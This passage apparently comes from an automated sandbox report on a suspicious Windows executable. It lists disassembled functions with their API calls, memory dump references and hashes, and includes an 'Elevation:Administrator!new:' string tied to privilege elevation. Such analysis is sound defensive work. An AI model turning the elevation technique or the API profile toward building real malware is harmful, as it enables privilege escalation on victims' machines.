                                                                                                                                                                                                                                                                                                                                                                  Function 0040B453 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4278b43e27663415cba18f20cd4f792bdb1a65b806582fdca38cb5ba5a4c1545
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D515B75A04244DFEB08CF98C590BAABBB2EF94304F2881E9D9015B387C675EE41DB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004069BB Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: df007bf62870af7b74df0dbbe881ec21055e906183b30cdd37e1bfed71aa1605
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE0EC631002087AD7102995DC46FE7765DD7C83A9F508432F705E61D1D63DD95092AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040158C Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000001F4,0007405C,00000000,00000000,?,00000008,00405A0B,00000000), ref: 004015AE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 98b00b6936f3a10efa9a674e71bb74e0dcfe603724a387bcbcad0dffbf1469cf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 99371d9e342f55f1bbc85bd8c476da0c26e9402948ab4de55a1e54ae49f6dd3b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98b00b6936f3a10efa9a674e71bb74e0dcfe603724a387bcbcad0dffbf1469cf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF03076E44204BAE714EBA48C82F6B776DE744704F1081A9B605F61C0EA74AA018BBA
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401352 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a34d84a8aa74edc03bf23277289f2878ef58b524965e171c6cbb9bf5a1c13c13
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF01276C0020CFFCF01AFA5C995CADBF75FF08204B0484AEF90426162DB369A24EB04
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040A554 Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 523668955e0e2244aa789caa92f6427d01868abc63ade59164da16a1192ab317
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5E0D831004604ADCB11DE58EC8EBDA7298D705311F6498339906FD581CB3CDA85859F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040135E Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3339b175f8b132734afde4b87bcd326777cd273dbfa93b5593f16fc1374389e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF0F876C0020CBFCF01AFA5D955C9DBFB9FF48200F0084AEB91466162D7369A20AB54
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004047DB Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 425319291f41f57d8ddd7af97c040428323980b2498e4bb20d22353919547d1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c9214f333475bc89ecd2d70b7295bcdaad91083d6e94d736a289ab9c47a493dc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 425319291f41f57d8ddd7af97c040428323980b2498e4bb20d22353919547d1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1B01261D0D14C13CF209B3168041947B29E6D5609B1003DCEC0D201229B13D41047A3
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040930C Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000040,?,?,?,00401D6F,?,00000004), ref: 0040931A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fbf826679867081d8f65b02a643174af9db75dbf243e506da0a382be49be1460
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c1ed8782e068432966769c92f22ccf836d2bf65aa78af723960710e09a7f87a5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbf826679867081d8f65b02a643174af9db75dbf243e506da0a382be49be1460
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BD0C975A0420CBBCB00DF88E942D59BBECEB09214F004195FE0CDB240D671AE008A95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040CC5F Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,00405A18,?,00405A18,00000070,?,?,?,00401322), ref: 0040CC68
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f3e2705f243469e8b18360c5bb887dd51615c543d62bfa3a82b819ceace6c8ed
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f1da3139afef55b26450597318142262e87c8731a1b2672ee4cfa4472a97f69
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3e2705f243469e8b18360c5bb887dd51615c543d62bfa3a82b819ceace6c8ed
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CB0123564430CBBD6006BC8EC05FE5379CE708A1AF000010FA0C86140D6A0B84046A6
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 0040D1F6 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 169libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040AEB6,?,?,004046B5), ref: 0040D1FE
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040D336
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D3A8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: advapi32.dll$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2593893887-1356967432
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca720bcfbdb204521244a6d16e88fbee784b87e4b750a5d7fd7297a05bd30f3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC511DF2D10210EFD304BFA1BCC28393AB5E649305744457FF985A72A1F6B9A9448B6B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00405312 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlNtStatusToDosError.NTDLL(C0000023), ref: 004037E8
                                                                                                                                                                                                                                                                                                                                                                  • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004037EF
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Error$EnvironmentExpandInitLastRestoreStatusStringStrings_UnicodeWin32
                                                                                                                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4202685462-1885708031
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2625ad76528c3a05819e41784e94355af3192e6a8ec1aace2841fc774e878e1c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5115175D14209EFDB14DFE4C984AAEBB79EF08301F10856AE915B32C0EB789705CB56
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409727 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4251798642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
